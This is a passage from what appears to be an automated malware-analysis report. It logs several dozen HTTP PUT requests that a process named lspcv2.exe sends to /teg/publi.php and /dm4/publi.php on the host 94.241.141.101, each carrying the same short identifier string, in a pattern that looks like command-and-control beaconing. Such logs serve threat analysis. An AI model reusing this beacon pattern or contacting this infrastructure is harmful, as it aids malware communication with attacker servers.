                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  91192.168.2.45009094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:22.167197943 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:22.172390938 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:23.048171997 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:22 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  92192.168.2.45009394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:22.484222889 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:22.489232063 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:23.368228912 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:23 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  93192.168.2.45009694.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:22.597182989 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:22.602072954 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:23.487541914 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:23 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  94192.168.2.45009994.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:23.167635918 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:23.172528982 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:24.046369076 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:23 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  95192.168.2.45010394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:23.484448910 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:23.489361048 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:24.360596895 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:24 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  96192.168.2.45010494.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:23.610367060 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:23.615186930 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:24.481467009 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:24 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  97192.168.2.45010894.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:24.168046951 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:24.173306942 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:25.062972069 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:24 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  98192.168.2.45011094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:24.484895945 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:24.490391970 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:25.363231897 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:25 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  99192.168.2.45011294.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:24.599447966 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:24.604752064 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:25.497446060 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:25 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  100192.168.2.45011694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:25.185024023 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:25.189925909 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:26.083884001 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:25 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  101192.168.2.45011994.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:25.485979080 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:25.491101980 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:26.451997995 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:26 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  102192.168.2.45012094.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:25.627593994 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:25.632509947 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:26.505048990 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:26 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  103192.168.2.45012594.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:26.203217983 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:26.209075928 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:27.087095976 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:26 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  104192.168.2.45012894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:26.581463099 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:26.586308956 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:27.469418049 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:27 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  105192.168.2.45013094.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:26.630498886 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:26.635756016 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:27.531162977 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:27 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  106192.168.2.45013394.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:27.201344967 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:27.206454992 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:28.097647905 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:27 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  107192.168.2.45013894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:27.596833944 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:27.601768017 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:28.476037025 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:28 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  108192.168.2.45013994.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:27.657650948 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:27.662507057 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:28.580079079 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:28 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  109192.168.2.45014194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:28.214709997 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:28.220026970 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:29.104486942 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:28 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  110192.168.2.45014694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:28.598071098 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:28.603025913 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:29.486960888 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  111192.168.2.45014794.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:28.705671072 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:28.710704088 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:29.581828117 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  112192.168.2.45015094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:29.214881897 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:29.219918966 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:30.134290934 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  113192.168.2.45015494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:29.615062952 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:29.620707989 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:30.491475105 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  114192.168.2.45015594.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:29.710455894 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:29.715941906 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:30.608570099 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  115192.168.2.45016194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:30.246243000 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:30.251149893 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:31.256499052 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  116192.168.2.45016294.241.141.10180
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:30.616844893 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:30.621623993 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
